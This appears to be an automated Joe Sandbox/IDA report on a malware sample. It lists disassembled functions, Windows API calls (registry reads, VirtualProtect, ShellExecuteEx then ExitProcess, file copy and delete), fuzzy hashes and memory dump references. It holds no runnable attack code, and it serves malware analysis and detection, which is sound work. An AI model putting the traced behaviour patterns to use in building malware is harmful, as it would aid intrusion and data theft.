Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: Fs$%dx%d
API String ID: 2716131235-1170756869
Opcode ID: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
Instruction ID: 8fd6ee9cf941b69272b4f7535935de876aea908a5dd703f80f5b78b9d81496f0
Opcode Fuzzy Hash: 034488dc9ab3a7bb2c8e4630d4156bd73c62dfc3ab6266d9a1064524eb27a7da
Instruction Fuzzy Hash: 042145B2E54204AFDB04DFD4DD45FAEB7B8FB48701F104159F509A7280C7795940DBA2

Function 00747E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747E37
HeapAlloc.KERNEL32(00000000), ref: 00747E3E
RegOpenKeyExA.ADVAPI32(80000002,00FC81F8,00000000,00020119,?), ref: 00747E5E
RegQueryValueExA.ADVAPI32(?,00FD05F0,00000000,00000000,000000FF,000000FF), ref: 00747E7F
RegCloseKey.ADVAPI32(?), ref: 00747E92

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
Instruction ID: 565838a3f15e9f8a2e4cf7f7572c4596fc484d35a4b6abe0e6d492e9db489cdb
Opcode Fuzzy Hash: 5ed2b5f72ad23cb4075a48ad98a0e71a146f95b5b03804fc41e0af18516983fb
Instruction Fuzzy Hash: AC119EB2A48205EBD714CF94DC49FBFBBB8FB44B01F104259FA09A7280D7785800DBA2

Function 00749260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00FD0078,?,?,?,0074140C,?,00FD0078,00000000), ref: 0074926C
lstrcpyn.KERNEL32(0097AB88,00FD0078,00FD0078,?,0074140C,?,00FD0078), ref: 00749290
lstrlenA.KERNEL32(?,?,0074140C,?,00FD0078), ref: 007492A7
wsprintfA.USER32 ref: 007492C7

Strings

%s%s, xrefs: 007492B5

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
Instruction ID: 3318c50862d2f62da51926661aedd7bbecff27418c6c1c34f0c499409a5b56f2
Opcode Fuzzy Hash: c39b6a032a55a14b41ed04f07b1266c42736f94b46b8b20a8eff38a3e8b8c59b
Instruction Fuzzy Hash: E401A976504208FFCB04DFE8C984EAE7BB9EB84365F108148F9099B204C675AA40DBD5

Function 007312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007312B4
HeapAlloc.KERNEL32(00000000), ref: 007312BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007312F5
RegCloseKey.ADVAPI32(?), ref: 007312FF

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
Instruction ID: 35661ef61d7ec6be0127a40ad5e4a03b931feae88d6c7f610b25dc2ef12b2b0d
Opcode Fuzzy Hash: 94b0e5d0fafb07a18d03006327a6e705ffe999967dab6c2453d2a0b9c72a0a36
Instruction Fuzzy Hash: C70131BAA54208BBDB04DFE0DC49FAEB7B8EB88701F008159FA0997280D6749A419F51

Function 0074C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0074C74E

Part of subcall function 0074BF9F: __getptd_noexit.LIBCMT ref: 0074BFA2
Part of subcall function 0074BF9F: __amsg_exit.LIBCMT ref: 0074BFAF

__getptd.LIBCMT ref: 0074C765
__amsg_exit.LIBCMT ref: 0074C773
__lock.LIBCMT ref: 0074C783
__updatetlocinfoEx_nolock.LIBCMT ref: 0074C797

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 74eeb44bc61d54189d7a6665a1ee94a090e5dc8f65fdab6d29781637e1d898ee
Instruction ID: 2c660ba57e39ae4b0542892c7361bf7cab499245b4efcb49177c863d19a47d43
Opcode Fuzzy Hash: 74eeb44bc61d54189d7a6665a1ee94a090e5dc8f65fdab6d29781637e1d898ee
Instruction Fuzzy Hash: 3DF0B432946300EBD763BBB8580B79E33A06F00721F248149F404A61D2DB6C9D448E5A

Function 00740740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00FCD5B0), ref: 0074079A
StrCmpCA.SHLWAPI(00000000,00FCD8A0), ref: 00740866
StrCmpCA.SHLWAPI(00000000,00FCD7B0), ref: 0074099D

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Strings

`_t, xrefs: 00740A40, 00740A54, 00740803, 0074091B, 00740806, 0074091E, 00740A43

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_t
API String ID: 3722407311-3722307212
Opcode ID: 7c86f35e21359733f8dbeac210af3b0b154ec13c79217c99e0d564c0c6195f61
Instruction ID: 9dddedcdc9a7854702ff1bc50410bde9a0eb63d0e1251ad671404e412c37c1a2
Opcode Fuzzy Hash: 7c86f35e21359733f8dbeac210af3b0b154ec13c79217c99e0d564c0c6195f61
Instruction Fuzzy Hash: 49917975B10208EFDB28EF64D995BED77B9FF94300F408519E8099F252DB34AA05CB92

Function 00740765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00FCD5B0), ref: 0074079A
StrCmpCA.SHLWAPI(00000000,00FCD8A0), ref: 00740866
StrCmpCA.SHLWAPI(00000000,00FCD7B0), ref: 0074099D

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Strings

`_t, xrefs: 00740803, 0074091B, 00740806, 0074091E

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_t
API String ID: 3722407311-3722307212
Opcode ID: 346800918303e45537a7213e0aaed1723c3c4a49e692c3292cedfaad720ecfa3
Instruction ID: d43414390f248d4e268f0ac4bcd915ccd8544247892f55ae494773a3f87d9d4e
Opcode Fuzzy Hash: 346800918303e45537a7213e0aaed1723c3c4a49e692c3292cedfaad720ecfa3
Instruction Fuzzy Hash: 3C816975B10208EFDB28EF64D995EEDB7B5FF94300F508519E8099F251DB34AA05CB82

Function 00746630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00746663

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

ShellExecuteEx.SHELL32(0000003C), ref: 00746726
ExitProcess.KERNEL32 ref: 00746755

Strings

<, xrefs: 007466D9

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 1ce441b0fba41737ec56b59a577a5d5a1c19ffa881d9e5687baaf51af0465587
Instruction ID: 2a9ae30dd6e8d55f1be46abb08b92907c9ac49bb0a70e3435452fecddbb71802
Opcode Fuzzy Hash: 1ce441b0fba41737ec56b59a577a5d5a1c19ffa881d9e5687baaf51af0465587
Instruction Fuzzy Hash: D2314DB2C51208EADB15EB50DC86BDD777CAF44300F404198F20966191DF786B88CF56

Function 00736BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@Jns,@Jns), ref: 00736C9F

Strings

Jns, xrefs: 00736BED, 00736C0D, 00736C8F
Jns, xrefs: 00736C1D, 00736C39, 00736C88, 00736C98, 00736C04, 00736C28, 00736C33
@Jns, xrefs: 00736C80, 00736C83

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @Jns$Jns$Jns
API String ID: 544645111-146087769
Opcode ID: fb81248735e357c01c2332430a8562bcd9fed5229d2ad1b32439689558a26981
Instruction ID: e276254814f41b11fb0101c271e45d485fadffff9c072bf8c05f8025d13bb6a5
Opcode Fuzzy Hash: fb81248735e357c01c2332430a8562bcd9fed5229d2ad1b32439689558a26981
Instruction Fuzzy Hash: 4821E974A05208EFEB04CF89C594BADBBB1FF48305F10C199D599AB342D739AA81DF91

Function 0074A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0074A972
lstrcatA.KERNEL32(00000000), ref: 0074A982

Strings

vIs, xrefs: 0074A929
vIs, xrefs: 0074A937

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: vIs$vIs
API String ID: 3905823039-325714837
Opcode ID: 598425a922c2c5c6066208e6450a3dc13c3826aa555deb185a5883e2147382f2
Instruction ID: 22e64df9565abd0eaa21dd4a6f6b032021b3f70d88a64a7637dd23662643b19f
Opcode Fuzzy Hash: 598425a922c2c5c6066208e6450a3dc13c3826aa555deb185a5883e2147382f2
Instruction Fuzzy Hash: C811E875900108EFCB05DF94D885AAEB3B5FF84300F108598E8159B351C734AE42CB91

Function 00748D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0074951E,00000000), ref: 00748D5B
HeapAlloc.KERNEL32(00000000,?,?,0074951E,00000000), ref: 00748D62
wsprintfW.USER32 ref: 00748D78

Strings

%hs, xrefs: 00748D6F

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
Instruction ID: fe229aea99fc32efd32934b0a17ca1cf4f5b38e2377af9f98e0e382cd0dfba5f
Opcode Fuzzy Hash: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
Instruction Fuzzy Hash: 75E08CB2A54208BBC700DB94DC0AEAD77BCEB84702F040094FD0D87280DA75AE50ABA2

Function 00743BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00743935
StrCmpCA.SHLWAPI(?,00750F70), ref: 00743947
StrCmpCA.SHLWAPI(?,00750F74), ref: 0074395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00743C67
FindClose.KERNEL32(000000FF), ref: 00743C7C

Strings

P2#v, xrefs: 00743C67
!=t, xrefs: 00743C82

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: !=t$P2#v
API String ID: 3840410801-3600097812
Opcode ID: 797bef105ab45e36ce3f9d2a44565fcdb5bb24d955656a2cf736abf12c6527b1
Instruction ID: 1cac12a7a312699cae688dfcf47f57beee98dbe2b99fb9e234b42503024842b1
Opcode Fuzzy Hash: 797bef105ab45e36ce3f9d2a44565fcdb5bb24d955656a2cf736abf12c6527b1
Instruction Fuzzy Hash: 5AD012729041199BDB14DB94DD899A97378DB94305F0041C8B40E96110EB399B819B51

Function 0073A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073A2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 0073A3FF
lstrlenA.KERNEL32(00000000), ref: 0073A6BC

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 00739E10: memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D

DeleteFileA.KERNEL32(00000000), ref: 0073A743

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: eb8fa2031b711efae50aebe726c9a7d0ae81ad0f2c715016b374a2789a0c7e02
Instruction ID: 6572173ee20c28a1d61e7c84ae26954da52f2fd61711d16b2bea9c61ba9ba16f
Opcode Fuzzy Hash: eb8fa2031b711efae50aebe726c9a7d0ae81ad0f2c715016b374a2789a0c7e02
Instruction Fuzzy Hash: F1E1EE72950108FAEB05FBA4DC9AEEE737CEF54304F508169F51672091EF386A49CB62

Function 0073D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

